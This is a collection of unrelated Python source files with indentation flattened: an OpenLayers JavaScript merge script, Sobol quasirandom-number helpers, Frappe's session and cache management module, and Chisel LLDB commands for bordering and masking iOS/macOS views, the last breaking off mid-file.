# // @requires Geo/DataSource.js
#
# This script should be executed like so:
#
# mergejs.py <output.js> <directory> [...]
#
# e.g.
#
# mergejs.py openlayers.js Geo/ CrossBrowser/
#
# This example will cause the script to walk the `Geo` and
# `CrossBrowser` directories--and subdirectories thereof--and import
# all `*.js` files encountered. The dependency declarations will be extracted
# and then the source code from imported files will be output to
# a file named `openlayers.js` in an order which fulfils the dependencies
# specified.
#
#
# Note: This is a very rough initial version of this code.
#
# -- Copyright 2005-2013 OpenLayers contributors / OpenLayers project --
#
# TODO: Allow files to be excluded. e.g. `Crossbrowser/DebugMode.js`?
# TODO: Report error when dependency can not be found rather than KeyError.
import re
import os
import sys
from collections import OrderedDict
SUFFIX_JAVASCRIPT = ".js"
RE_REQUIRE = r"@requires?:?\s+(\S*)\s*\n" # TODO: Ensure in comment?
class MissingImport(Exception):
"""Exception raised when a listed import is not found in the lib."""
class SourceFile:
"""
Represents a Javascript source code file.
"""
def __init__(self, filepath, source, cfgExclude):
"""
"""
self.filepath = filepath
self.source = source
self.excludedFiles = []
self.requiredFiles = []
auxReq = re.findall(RE_REQUIRE, self.source)
for filename in auxReq:
if undesired(filename, cfgExclude):
self.excludedFiles.append(filename)
else:
self.requiredFiles.append(filename)
self.requiredBy = []
def _getRequirements(self):
"""
Extracts the dependencies specified in the source code and returns
a list of them.
"""
return self.requiredFiles
requires = property(fget=_getRequirements, doc="")
def usage(filename):
"""
Displays a usage message.
"""
print("%s [-c <config file>] <output.js> <directory> [...]" % filename)
class Config:
"""
Represents a parsed configuration file.
A configuration file should be of the following form:
[first]
3rd/prototype.js
core/application.js
core/params.js
# A comment
[last]
core/api.js # Another comment
[include]
[exclude]
3rd/logger.js
exclude/this/dir
All headings are required.
The files listed in the `first` section will be forced to load
*before* all other files (in the order listed). The files in `last`
section will be forced to load *after* all the other files (in the
order listed).
The files listed in the `exclude` section will not be imported.
Any text appearing after a # symbol indicates a comment.
"""
def __init__(self, filename):
"""
Parses the content of the named file and stores the values.
"""
lines = [re.sub("#.*?$", "", line).strip() # Assumes end-of-line character is present
for line in open(filename)
if line.strip() and not line.strip().startswith("#")] # Skip blank lines and comments
self.forceFirst = lines[lines.index("[first]") + 1:lines.index("[last]")]
self.forceLast = lines[lines.index("[last]") + 1:lines.index("[include]")]
self.include = lines[lines.index("[include]") + 1:lines.index("[exclude]")]
self.exclude = lines[lines.index("[exclude]") + 1:]
def undesired(filepath, excludes):
# exclude file if listed
exclude = filepath in excludes
if not exclude:
# check if directory is listed
for excludepath in excludes:
if not excludepath.endswith("/"):
excludepath += "/"
if filepath.startswith(excludepath):
exclude = True
break
return exclude
def getNames (sourceDirectory, configFile = None):
return run(sourceDirectory, None, configFile, True)
def run (sourceDirectory, outputFilename = None, configFile = None,
returnAsListOfNames = False):
cfg = None
if configFile:
cfg = Config(configFile)
allFiles = []
## Find all the Javascript source files
for root, dirs, files in os.walk(sourceDirectory):
for filename in files:
if filename.endswith(SUFFIX_JAVASCRIPT) and not filename.startswith("."):
filepath = os.path.join(root, filename)[len(sourceDirectory)+1:]
filepath = filepath.replace("\\", "/")
if cfg and cfg.include:
if filepath in cfg.include or filepath in cfg.forceFirst:
allFiles.append(filepath)
elif (not cfg) or (not undesired(filepath, cfg.exclude)):
allFiles.append(filepath)
## Header inserted at the start of each file in the output
HEADER = "/* " + "=" * 70 + "\n %s\n" + " " + "=" * 70 + " */\n\n"
files = OrderedDict()
## Import file source code
## TODO: Do import when we walk the directories above?
for filepath in allFiles:
print("Importing: %s" % filepath)
fullpath = os.path.join(sourceDirectory, filepath).strip()
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[filepath] = SourceFile(filepath, content, cfg.exclude if cfg else []) # TODO: Chop path?
print()
from toposort import toposort
complete = False
resolution_pass = 1
while not complete:
complete = True
## Resolve the dependencies
print("Resolution pass %s... " % resolution_pass)
resolution_pass += 1
for filepath, info in list(files.items()):
for path in info.requires:
if not path in files:
complete = False
fullpath = os.path.join(sourceDirectory, path).strip()
if os.path.exists(fullpath):
print("Importing: %s" % path)
content = open(fullpath, "U").read() # TODO: Ensure end of line @ EOF?
files[path] = SourceFile(path, content, cfg.exclude if cfg else []) # TODO: Chop path?
else:
raise MissingImport("File '%s' not found (required by '%s')." % (path, filepath))
# create dictionary of dependencies
dependencies = OrderedDict()
for filepath, info in files.items():
dependencies[filepath] = info.requires
print("Sorting...")
order = toposort(dependencies) #[x for x in toposort(dependencies)]
## Move forced first and last files to the required position
if cfg:
print("Re-ordering files...")
order = cfg.forceFirst + [item
for item in order
if ((item not in cfg.forceFirst) and
(item not in cfg.forceLast))] + cfg.forceLast
print()
## Output the files in the determined order
result = []
# Return as a list of filenames
if returnAsListOfNames:
for fp in order:
fName = os.path.normpath(os.path.join(sourceDirectory, fp)).replace("\\","/")
print("Append: %s" % fName)
f = files[fp]
for fExclude in f.excludedFiles:
print(" Required file \"%s\" is excluded." % fExclude )
result.append(fName)
print("\nTotal files: %d " % len(result))
return result
# Return as merged source code
for fp in order:
f = files[fp]
print("Exporting: %s" % f.filepath)
for fExclude in f.excludedFiles:
print(" Required file \"%s\" is excluded." % fExclude )
result.append(HEADER % f.filepath)
source = f.source
result.append(source)
if not source.endswith("\n"):
result.append("\n")
print("\nTotal files merged: %d " % len(files))
if outputFilename:
print("\nGenerating: %s" % (outputFilename))
open(outputFilename, "w").write("".join(result))
return "".join(result)
if __name__ == "__main__":
import getopt
options, args = getopt.getopt(sys.argv[1:], "-c:")
try:
outputFilename = args[0]
except IndexError:
usage(sys.argv[0])
raise SystemExit
else:
sourceDirectory = args[1]
if not sourceDirectory:
usage(sys.argv[0])
raise SystemExit
configFile = None
if options and options[0][0] == "-c":
configFile = options[0][1]
print("Parsing configuration file: %s" % filename)
run( sourceDirectory, outputFilename, configFile )
|
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Helper functions
"""
from __future__ import print_function, division
import math
import numpy as np
__all__ = ['i4_sobol']
def i4_bit_hi1(n):
"""Returns the position of the high 1 bit base 2 in an integer.
Parameters
----------
n : int
The integer to be measured.
Should be nonnegative.
If N is nonpositive, the value will always be 0.
Returns
-------
bit : int
the number of bits base 2
Example
-------
N Binary BIT
---- -------- ----
0 0 0
1 1 1
2 10 2
3 11 2
4 100 3
5 101 3
6 110 3
7 111 3
8 1000 4
9 1001 4
10 1010 4
11 1011 4
12 1100 4
13 1101 4
14 1110 4
15 1111 4
16 10000 5
17 10001 5
1023 1111111111 10
1024 10000000000 11
1025 10000000001 11
"""
i = math.floor(n)
bit = 0
while (1):
if (i <= 0):
break
bit += 1
i = math.floor(i/2)
return bit
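# Illustrative note (not part of the original module): for a nonnegative
# integer n, i4_bit_hi1(n) is equivalent to Python's built-in int.bit_length(),
# e.g. (1023).bit_length() == 10 and (1024).bit_length() == 11, matching the
# table above.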
def i4_bit_lo0(n):
"""Returns the position of the low 0 bit base 2 in an integer.
Parameters
----------
n : int
The integer to be measured
Should be nonnegative
Returns
-------
bit : int
The position of the low 0 bit
Example
-------
N Binary BIT
---- -------- ----
0 0 1
1 1 2
2 10 1
3 11 3
4 100 1
5 101 2
6 110 1
7 111 4
8 1000 1
9 1001 2
10 1010 1
11 1011 3
12 1100 1
13 1101 2
14 1110 1
15 1111 5
16 10000 1
17 10001 2
1023 1111111111 1
1024 10000000000 1
1025 10000000001 1
"""
bit = 0
i = math.floor(n)
while (1):
bit += 1
i2 = math.floor(i/2)
if (i == 2 * i2):
break
i = i2
return bit
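# Illustrative note (not part of the original module): for a nonnegative
# integer n, the position of the lowest 0 bit can also be computed as
# ((~n) & (n + 1)).bit_length(), e.g. n = 5 (binary 101) gives 2, matching
# the table above.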
def i4_sobol(dim, seed):
"""Generates a new quasirandom Sobol vector with each call.
Parameters
----------
dim : int
The number of spatial dimensions
Must satisfy 1 <= dim <= 40
seed : int
Input/output, integer SEED, the "seed" for the sequence.
This is essentially the index in the sequence of the quasirandom
value to be generated. On output, SEED has been set to the
appropriate next value, usually simply SEED+1.
If SEED is less than 0 on input, it is treated as though it were 0.
An input value of 0 requests the first (0-th) element of the sequence.
Returns
-------
quasi : array
The next quasirandom vector
seed : int
The "seed" for the sequence
"""
global atmost
global dim_max
global dim_save
global initialized
global lastq
global log_max
global maxcol
global poly
global recipd
global seed_save
global v
if (not 'initialized' in globals().keys()):
initialized = 0
dim_save = -1
if (not initialized or dim != dim_save):
initialized = 1
dim_max = 40
dim_save = -1
log_max = 30
seed_save = -1
# Initialize (part of) V.
v = np.zeros((dim_max, log_max))
v[0:40, 0] = np.transpose([
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 1])
v[2:40, 1] = np.transpose([
1, 3, 1, 3, 1, 3, 3, 1,
3, 1, 3, 1, 3, 1, 1, 3, 1, 3,
1, 3, 1, 3, 3, 1, 3, 1, 3, 1,
3, 1, 1, 3, 1, 3, 1, 3, 1, 3])
v[3:40, 2] = np.transpose([
7, 5, 1, 3, 3, 7, 5,
5, 7, 7, 1, 3, 3, 7, 5, 1, 1,
5, 3, 3, 1, 7, 5, 1, 3, 3, 7,
5, 1, 1, 5, 7, 7, 5, 1, 3, 3])
v[5:40, 3] = np.transpose([
1, 7, 9, 13, 11,
1, 3, 7, 9, 5, 13, 13, 11, 3, 15,
5, 3, 15, 7, 9, 13, 9, 1, 11, 7,
5, 15, 1, 15, 11, 5, 3, 1, 7, 9])
v[7:40, 4] = np.transpose([
9, 3, 27,
15, 29, 21, 23, 19, 11, 25, 7, 13, 17,
1, 25, 29, 3, 31, 11, 5, 23, 27, 19,
21, 5, 1, 17, 13, 7, 15, 9, 31, 9])
v[13:40, 5] = np.transpose([
37, 33, 7, 5, 11, 39, 63,
27, 17, 15, 23, 29, 3, 21, 13, 31, 25,
9, 49, 33, 19, 29, 11, 19, 27, 15, 25])
v[19:40, 6] = np.transpose([
13,
33, 115, 41, 79, 17, 29, 119, 75, 73, 105,
7, 59, 65, 21, 3, 113, 61, 89, 45, 107])
v[37:40, 7] = np.transpose([7, 23, 39])
# Set POLY.
poly = [
1, 3, 7, 11, 13, 19, 25, 37, 59, 47,
61, 55, 41, 67, 97, 91, 109, 103, 115, 131,
193, 137, 145, 143, 241, 157, 185, 167, 229, 171,
213, 191, 253, 203, 211, 239, 247, 285, 369, 299]
atmost = 2**log_max - 1
# Find the number of bits in ATMOST.
maxcol = i4_bit_hi1(atmost)
# Initialize row 1 of V.
v[0, 0:maxcol] = 1
# Things to do only if the dimension changed.
if (dim != dim_save):
dim_save = dim
# Initialize the remaining rows of V.
for i in range(2, dim+1):
# The bits of the integer POLY(I) gives the form of polynomial I.
# Find the degree of polynomial I from binary encoding.
j = poly[i-1]
m = 0
while (1):
j = math.floor(j/2)
if (j <= 0):
break
m = m + 1
# Expand this bit pattern to separate components of the logical
# array INCLUD.
j = poly[i-1]
includ = np.zeros(m)
for k in range(m, 0, -1):
j2 = math.floor(j/2)
includ[k-1] = (j != 2 * j2)
j = j2
# Calculate the remaining elements of row I as explained
# in Bratley and Fox, section 2.
for j in range(m+1, maxcol+1):
newv = v[i-1, j-m-1]
l = 1
for k in range(1, m+1):
l = 2 * l
if (includ[k-1]):
newv = np.bitwise_xor(int(newv),
int(l * v[i-1, j-k-1]))
v[i-1, j-1] = newv
# Multiply columns of V by appropriate power of 2.
l = 1
for j in range(maxcol-1, 0, -1):
l = 2 * l
v[0:dim, j-1] = v[0:dim, j-1] * l
# RECIPD is 1/(common denominator of the elements in V).
recipd = 1 / (2*l)
lastq = np.zeros(dim)
seed = int(math.floor(seed))
if (seed < 0):
seed = 0
if (seed == 0):
l = 1
lastq = np.zeros(dim)
elif (seed == seed_save + 1):
# Find the position of the right-hand zero in SEED.
l = i4_bit_lo0(seed)
elif (seed <= seed_save):
seed_save = 0
l = 1
lastq = np.zeros(dim)
for seed_temp in range(int(seed_save), int(seed)):
l = i4_bit_lo0(seed_temp)
for i in range(1, dim+1):
lastq[i-1] = np.bitwise_xor(int(lastq[i-1]), int(v[i-1, l-1]))
l = i4_bit_lo0(seed)
elif (seed_save + 1 < seed):
for seed_temp in range(int(seed_save + 1), int(seed)):
l = i4_bit_lo0(seed_temp)
for i in range(1, dim+1):
lastq[i-1] = np.bitwise_xor(int(lastq[i-1]), int(v[i-1, l-1]))
l = i4_bit_lo0(seed)
# Check that the user is not calling too many times!
if (maxcol < l):
msg = 'Too many calls!\n' + ('MAXCOL = %d\n' % maxcol) + ('L = %d\n' % l)
raise ValueError(msg)
# Calculate the new components of QUASI.
quasi = np.zeros(dim)
for i in range(dim):
quasi[i] = lastq[i] * recipd
lastq[i] = np.bitwise_xor(int(lastq[i]), int(v[i, l-1]))
seed_save = seed
seed = seed + 1
return [quasi, seed]
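# Illustrative usage sketch (not part of the original module): successive
# calls thread the returned seed back in to walk the sequence, as described
# in the docstring above.
#
#     seed = 0
#     for _ in range(4):
#         quasi, seed = i4_sobol(2, seed)  # next 2-D Sobol point in [0, 1)^2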
def i4_uniform(a, b, seed):
"""Returns a scaled pseudorandom I4.
Discussion:
The pseudorandom number will be scaled to be uniformly distributed
between A and B.
Parameters
----------
a : int
The minimum acceptable values
b : int
The maximum acceptable values
seed : int
Seed for the random number generator
Returns
-------
c : int
The randomly chosen integer
seed : int
The updated seed
"""
if (seed == 0):
print('I4_UNIFORM - Fatal error!')
print(' Input SEED = 0!')
seed = math.floor(seed)
a = round(a)
b = round(b)
seed = np.mod(seed, 2147483647)
if (seed < 0):
seed = seed + 2147483647
k = math.floor(seed / 127773)
seed = 16807 * (seed - k * 127773) - k * 2836
if (seed < 0):
seed = seed + 2147483647
r = seed * 4.656612875E-10
# Scale R to lie between A-0.5 and B+0.5.
r = (1.0 - r) * (min(a, b) - .5) + r * (max(a, b) + .5)
# Use rounding to convert R to an integer between A and B.
value = round(r)
value = max(value, min(a, b))
value = min(value, max(a, b))
c = value
return [int(c), int(seed)]
def prime_ge(n):
"""Returns the smallest prime greater than or equal to N.
Parameters
----------
n : int
The number to be bounded
Returns
-------
p : int
The smallest prime number that is greater than or equal to N
Example
-------
N PRIME_GE
-10 2
1 2
2 2
3 3
4 5
5 5
6 7
7 7
8 11
9 11
10 11
"""
p = max(math.ceil(n), 2)
while (not isprime(p)):
p += 1
return p
def isprime(n):
"""Returns True if N is a prime number, False otherwise.
Parameters
----------
n : int
The number to be checked
Returns
-------
bool
True or False
"""
if n != int(n) or n < 1:
return False
p = 2
while p < n:
if n % p == 0:
return False
p += 1
return True
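# Illustrative note (not part of the original module): isprime uses trial
# division over every 2 <= p < n, so a call costs O(n) divisions; checking
# divisors only up to int(math.sqrt(n)) would give the same result with far
# fewer iterations.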
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals
"""
Boot session from cache or build
Session bootstraps info needed by common client side activities including
permission, homepage, default variables, system defaults etc
"""
import frappe, json
from frappe import _
import frappe.utils
from frappe.utils import cint, cstr
import frappe.model.meta
import frappe.defaults
import frappe.translate
from frappe.utils.change_log import get_change_log
import redis
from urllib import unquote
@frappe.whitelist()
def clear(user=None):
frappe.local.session_obj.update(force=True)
frappe.local.db.commit()
clear_cache(frappe.session.user)
clear_global_cache()
frappe.response['message'] = _("Cache Cleared")
def clear_cache(user=None):
cache = frappe.cache()
groups = ("bootinfo", "user_recent", "user_roles", "user_doc", "lang",
"defaults", "user_permissions", "roles", "home_page", "linked_with",
"desktop_icons", 'portal_menu_items')
if user:
for name in groups:
cache.hdel(name, user)
cache.delete_keys("user:" + user)
frappe.defaults.clear_cache(user)
else:
for name in groups:
cache.delete_key(name, user)
clear_global_cache()
frappe.defaults.clear_cache()
def clear_global_cache():
frappe.model.meta.clear_cache()
frappe.cache().delete_value(["app_hooks", "installed_apps",
"app_modules", "module_app", "notification_config", 'system_settings'
'scheduler_events', 'time_zone'])
frappe.setup_module_map()
def clear_sessions(user=None, keep_current=False, device=None):
if not user:
user = frappe.session.user
if not device:
device = frappe.session.data.device or "desktop"
limit = 0
if user == frappe.session.user:
simultaneous_sessions = frappe.db.get_value('User', user, 'simultaneous_sessions') or 1
limit = simultaneous_sessions - 1
condition = ''
if keep_current:
condition = ' and sid != "{0}"'.format(frappe.db.escape(frappe.session.sid))
for i, sid in enumerate(frappe.db.sql_list("""select sid from tabSessions
where user=%s and device=%s {condition}
order by lastupdate desc limit {limit}, 100""".format(condition=condition, limit=limit),
(user, device))):
delete_session(sid, reason="Logged In From Another Session")
def delete_session(sid=None, user=None, reason="Session Expired"):
from frappe.core.doctype.communication.feed import logout_feed
frappe.cache().hdel("session", sid)
frappe.cache().hdel("last_db_session_update", sid)
if sid and not user:
user_details = frappe.db.sql("""select user from tabSessions where sid=%s""", sid, as_dict=True)
if user_details: user = user_details[0].get("user")
logout_feed(user, reason)
frappe.db.sql("""delete from tabSessions where sid=%s""", sid)
frappe.db.commit()
def clear_all_sessions(reason=None):
"""This effectively logs out all users"""
frappe.only_for("Administrator")
if not reason: reason = "Deleted All Active Session"
for sid in frappe.db.sql_list("select sid from `tabSessions`"):
delete_session(sid, reason=reason)
def clear_expired_sessions():
"""This function is meant to be called from scheduler"""
for device in ("desktop", "mobile"):
for sid in frappe.db.sql_list("""select sid from tabSessions
where TIMEDIFF(NOW(), lastupdate) > TIME(%s)
and device = %s""", (get_expiry_period(device), device)):
delete_session(sid, reason="Session Expired")
def get():
"""get session boot info"""
from frappe.desk.notifications import \
get_notification_info_for_boot, get_notifications
from frappe.boot import get_bootinfo, get_unseen_notes
from frappe.limits import get_limits, get_expiry_message
bootinfo = None
if not getattr(frappe.conf,'disable_session_cache', None):
# check if cache exists
bootinfo = frappe.cache().hget("bootinfo", frappe.session.user)
if bootinfo:
bootinfo['from_cache'] = 1
bootinfo["notification_info"].update(get_notifications())
bootinfo["user"]["recent"] = json.dumps(\
frappe.cache().hget("user_recent", frappe.session.user))
if not bootinfo:
# if not create it
bootinfo = get_bootinfo()
bootinfo["notification_info"] = get_notification_info_for_boot()
frappe.cache().hset("bootinfo", frappe.session.user, bootinfo)
try:
frappe.cache().ping()
except redis.exceptions.ConnectionError:
message = _("Redis cache server not running. Please contact Administrator / Tech support")
if 'messages' in bootinfo:
bootinfo['messages'].append(message)
else:
bootinfo['messages'] = [message]
# check only when clear cache is done, and don't cache this
if frappe.local.request:
bootinfo["change_log"] = get_change_log()
bootinfo["metadata_version"] = frappe.cache().get_value("metadata_version")
if not bootinfo["metadata_version"]:
bootinfo["metadata_version"] = frappe.reset_metadata_version()
bootinfo.notes = get_unseen_notes()
for hook in frappe.get_hooks("extend_bootinfo"):
frappe.get_attr(hook)(bootinfo=bootinfo)
bootinfo["lang"] = frappe.translate.get_user_lang()
bootinfo["disable_async"] = frappe.conf.disable_async
# limits
bootinfo.limits = get_limits()
bootinfo.expiry_message = get_expiry_message()
return bootinfo
def get_csrf_token():
if not frappe.local.session.data.csrf_token:
generate_csrf_token()
return frappe.local.session.data.csrf_token
def generate_csrf_token():
frappe.local.session.data.csrf_token = frappe.generate_hash()
frappe.local.session_obj.update(force=True)
# send sid and csrf token to the user
# handles the case when a user logs in again from another tab
# and it leads to invalid request in the current tab
frappe.publish_realtime(event="csrf_generated",
message={"sid": frappe.local.session.sid, "csrf_token": frappe.local.session.data.csrf_token},
user=frappe.session.user, after_commit=True)
class Session:
def __init__(self, user, resume=False, full_name=None, user_type=None):
self.sid = cstr(frappe.form_dict.get('sid') or
unquote(frappe.request.cookies.get('sid', 'Guest')))
self.user = user
self.device = frappe.form_dict.get("device") or "desktop"
self.user_type = user_type
self.full_name = full_name
self.data = frappe._dict({'data': frappe._dict({})})
self.time_diff = None
# set local session
frappe.local.session = self.data
if resume:
self.resume()
else:
if self.user:
self.start()
def start(self):
"""start a new session"""
# generate sid
if self.user=='Guest':
sid = 'Guest'
else:
sid = frappe.generate_hash()
self.data.user = self.user
self.data.sid = sid
self.data.data.user = self.user
self.data.data.session_ip = frappe.local.request_ip
if self.user != "Guest":
self.data.data.update({
"last_updated": frappe.utils.now(),
"session_expiry": get_expiry_period(self.device),
"full_name": self.full_name,
"user_type": self.user_type,
"device": self.device,
"session_country": get_geo_ip_country(frappe.local.request_ip) if frappe.local.request_ip else None,
})
# insert session
if self.user!="Guest":
self.insert_session_record()
# update user
frappe.db.sql("""UPDATE tabUser SET last_login = %(now)s, last_ip = %(ip)s, last_active = %(now)s
where name=%(name)s""", {
"now": frappe.utils.now(),
"ip": frappe.local.request_ip,
"name": self.data['user']
})
frappe.db.commit()
def insert_session_record(self):
frappe.db.sql("""insert into tabSessions
(sessiondata, user, lastupdate, sid, status, device)
values (%s , %s, NOW(), %s, 'Active', %s)""",
(str(self.data['data']), self.data['user'], self.data['sid'], self.device))
# also add to memcache
frappe.cache().hset("session", self.data.sid, self.data)
def resume(self):
"""non-login request: load a session"""
import frappe
data = self.get_session_record()
if data:
# set language
self.data.update({'data': data, 'user':data.user, 'sid': self.sid})
self.user = data.user
self.device = data.device
else:
self.start_as_guest()
if self.sid != "Guest":
frappe.local.user_lang = frappe.translate.get_user_lang(self.data.user)
frappe.local.lang = frappe.local.user_lang
def get_session_record(self):
"""get session record, or return the standard Guest Record"""
from frappe.auth import clear_cookies
r = self.get_session_data()
if not r:
frappe.response["session_expired"] = 1
clear_cookies()
self.sid = "Guest"
r = self.get_session_data()
return r
def get_session_data(self):
if self.sid=="Guest":
return frappe._dict({"user":"Guest"})
data = self.get_session_data_from_cache()
if not data:
data = self.get_session_data_from_db()
return data
def get_session_data_from_cache(self):
data = frappe.cache().hget("session", self.sid)
if data:
data = frappe._dict(data)
session_data = data.get("data", {})
# set user for correct timezone
self.time_diff = frappe.utils.time_diff_in_seconds(frappe.utils.now(),
session_data.get("last_updated"))
expiry = self.get_expiry_in_seconds(session_data.get("session_expiry"))
if self.time_diff > expiry:
self.delete_session()
data = None
return data and data.data
def get_session_data_from_db(self):
self.device = frappe.db.get_value("Sessions", {"sid": self.sid}, "device") or 'desktop'
rec = frappe.db.sql("""select user, sessiondata
from tabSessions where sid=%s and
TIMEDIFF(NOW(), lastupdate) < TIME(%s)""", (self.sid,
get_expiry_period(self.device)))
if rec:
data = frappe._dict(eval(rec and rec[0][1] or '{}'))
data.user = rec[0][0]
else:
self.delete_session()
data = None
return data
def get_expiry_in_seconds(self, expiry):
if not expiry:
return 3600
parts = expiry.split(":")
return (cint(parts[0]) * 3600) + (cint(parts[1]) * 60) + cint(parts[2])
def delete_session(self):
delete_session(self.sid, reason="Session Expired")
def start_as_guest(self):
"""all guests share the same 'Guest' session"""
self.user = "Guest"
self.start()
def update(self, force=False):
"""extend session expiry"""
if (frappe.session['user'] == "Guest" or frappe.form_dict.cmd=="logout"):
return
now = frappe.utils.now()
self.data['data']['last_updated'] = now
self.data['data']['lang'] = unicode(frappe.lang)
# update session in db
last_updated = frappe.cache().hget("last_db_session_update", self.sid)
time_diff = frappe.utils.time_diff_in_seconds(now, last_updated) if last_updated else None
# database persistence is secondary, don't update it too often
updated_in_db = False
if force or (time_diff==None) or (time_diff > 600):
# update sessions table
frappe.db.sql("""update tabSessions set sessiondata=%s,
lastupdate=NOW() where sid=%s""" , (str(self.data['data']),
self.data['sid']))
# update last active in user table
frappe.db.sql("""update `tabUser` set last_active=%(now)s where name=%(name)s""", {
"now": frappe.utils.now(),
"name": frappe.session.user
})
frappe.db.commit()
frappe.cache().hset("last_db_session_update", self.sid, now)
updated_in_db = True
# set in memcache
frappe.cache().hset("session", self.sid, self.data)
return updated_in_db
def get_expiry_period(device="desktop"):
if device=="mobile":
key = "session_expiry_mobile"
default = "720:00:00"
else:
key = "session_expiry"
default = "06:00:00"
exp_sec = frappe.defaults.get_global_default(key) or default
# in case seconds is missing
if len(exp_sec.split(':')) == 2:
exp_sec = exp_sec + ':00'
return exp_sec
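# Illustrative note (not an original comment): expiry periods are "HH:MM:SS"
# strings, so the desktop default "06:00:00" corresponds to 6 hours, which
# Session.get_expiry_in_seconds parses as 6*3600 + 0*60 + 0 = 21600 seconds.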
def get_geo_from_ip(ip_addr):
try:
from geoip import geolite2
return geolite2.lookup(ip_addr)
except ImportError:
return
except ValueError:
return
def get_geo_ip_country(ip_addr):
match = get_geo_from_ip(ip_addr)
if match:
return match.country
|
|
#!/usr/bin/python
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import fbchisellldbbase as fb
import fbchisellldbobjcruntimehelpers as runtimeHelpers
import fbchisellldbviewcontrollerhelpers as viewControllerHelpers
import fbchisellldbviewhelpers as viewHelpers
import lldb
def lldbcommands():
return [
FBCoreAnimationFlushCommand(),
FBDrawBorderCommand(),
FBRemoveBorderCommand(),
FBMaskViewCommand(),
FBUnmaskViewCommand(),
FBShowViewCommand(),
FBHideViewCommand(),
FBPresentViewControllerCommand(),
FBDismissViewControllerCommand(),
FBSlowAnimationCommand(),
FBUnslowAnimationCommand(),
]
class FBDrawBorderCommand(fb.FBCommand):
colors = [
"black",
"gray",
"red",
"green",
"blue",
"cyan",
"yellow",
"magenta",
"orange",
"purple",
"brown",
]
def name(self):
return "border"
def description(self):
return "Draws a border around <viewOrLayer>. Color and width can be optionally provided. Additionally depth can be provided in order to recursively border subviews."
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to border. NSViews must be layer-backed.",
)
]
def options(self):
return [
fb.FBCommandArgument(
short="-c",
long="--color",
arg="color",
type="string",
default="red",
help="A color name such as 'red', 'green', 'magenta', etc.",
),
fb.FBCommandArgument(
short="-w",
long="--width",
arg="width",
type="CGFloat",
default=2.0,
help="Desired width of border.",
),
fb.FBCommandArgument(
short="-d",
long="--depth",
arg="depth",
type="int",
default=0,
help="Number of levels of subviews to border. Each level gets a different color beginning with the provided or default color",
),
]
def run(self, args, options):
def setBorder(layer, width, color, colorClass):
fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, width))
fb.evaluateEffect(
"[%s setBorderColor:(CGColorRef)[(id)[%s %sColor] CGColor]]"
% (layer, colorClass, color)
)
obj = fb.evaluateInputExpression(args[0])
depth = int(options.depth)
isMac = runtimeHelpers.isMacintoshArch()
color = options.color
assert color in self.colors, "Color must be one of the following: {}".format(
" ".join(self.colors)
)
colorClassName = "UIColor"
if isMac:
colorClassName = "NSColor"
if viewHelpers.isView(obj):
prevLevel = 0
for view, level in viewHelpers.subviewsOfView(obj):
if level > depth:
break
if prevLevel != level:
color = self.nextColorAfterColor(color)
prevLevel = level
layer = viewHelpers.convertToLayer(view)
setBorder(layer, options.width, color, colorClassName)
else:
# `obj` is not a view, make sure recursive bordering is not requested
assert (
depth <= 0
), "Recursive bordering is only supported for UIViews or NSViews"
layer = viewHelpers.convertToLayer(obj)
setBorder(layer, options.width, color, colorClassName)
lldb.debugger.HandleCommand("caflush")
def nextColorAfterColor(self, color):
assert color in self.colors, "{} is not a supported color".format(color)
return self.colors[(self.colors.index(color) + 1) % len(self.colors)]
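# Illustrative usage sketch (not part of the original file), based on the
# name and options declared above; the view expression is a placeholder that
# depends on the app being debugged:
#
#     (lldb) border self.view
#     (lldb) border self.view -c blue -w 1 -d 2   # recurse two levels of subviews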
class FBRemoveBorderCommand(fb.FBCommand):
def name(self):
return "unborder"
def description(self):
return "Removes border around <viewOrLayer>."
def options(self):
return [
fb.FBCommandArgument(
short="-d",
long="--depth",
arg="depth",
type="int",
default=0,
help="Number of levels of subviews to unborder.",
)
]
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to unborder.",
)
]
def run(self, args, options):
def setUnborder(layer):
fb.evaluateEffect("[%s setBorderWidth:(CGFloat)%s]" % (layer, 0))
obj = args[0]
depth = int(options.depth)
if viewHelpers.isView(obj):
for view, level in viewHelpers.subviewsOfView(obj):
if level > depth:
break
layer = viewHelpers.convertToLayer(view)
setUnborder(layer)
else:
# `obj` is not a view, make sure recursive unbordering is not requested
assert (
depth <= 0
), "Recursive unbordering is only supported for UIViews or NSViews"
layer = viewHelpers.convertToLayer(obj)
setUnborder(layer)
lldb.debugger.HandleCommand("caflush")
class FBMaskViewCommand(fb.FBCommand):
def name(self):
return "mask"
def description(self):
return "Add a transparent rectangle to the window to reveal a possibly obscured or hidden view or layer's bounds"
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/NSView/CALayer *",
help="The view/layer to mask.",
)
]
def options(self):
return [
fb.FBCommandArgument(
short="-c",
long="--color",
arg="color",
type="string",
default="red",
help="A color name such as 'red', 'green', 'magenta', etc.",
),
fb.FBCommandArgument(
short="-a",
long="--alpha",
arg="alpha",
type="CGFloat",
default=0.5,
help="Desired alpha of mask.",
),
]
def run(self, args, options):
viewOrLayer = fb.evaluateObjectExpression(args[0])
viewHelpers.maskView(viewOrLayer, options.color, options.alpha)
class FBUnmaskViewCommand(fb.FBCommand):
def name(self):
return "unmask"
def description(self):
return "Remove mask from a view or layer"
def args(self):
return [
fb.FBCommandArgument(
arg="viewOrLayer",
type="UIView/CALayer *",
help="The view/layer to mask.",
)
]
def run(self, args, options):
viewOrLayer = fb.evaluateObjectExpression(args[0])
viewHelpers.unmaskView(viewOrLayer)
class FBCoreAnimationFlushCommand(fb.FBCommand):
def name(self):
return "caflush"
def description(self):
return "Force Core Animation to flush. This will 'repaint' the UI but also may mess with ongoing animations."
def run(self, arguments, options):
viewHelpers.flushCoreAnimationTransaction()
class FBShowViewCommand(fb.FBCommand):
def name(self):
return "show"
def description(self):
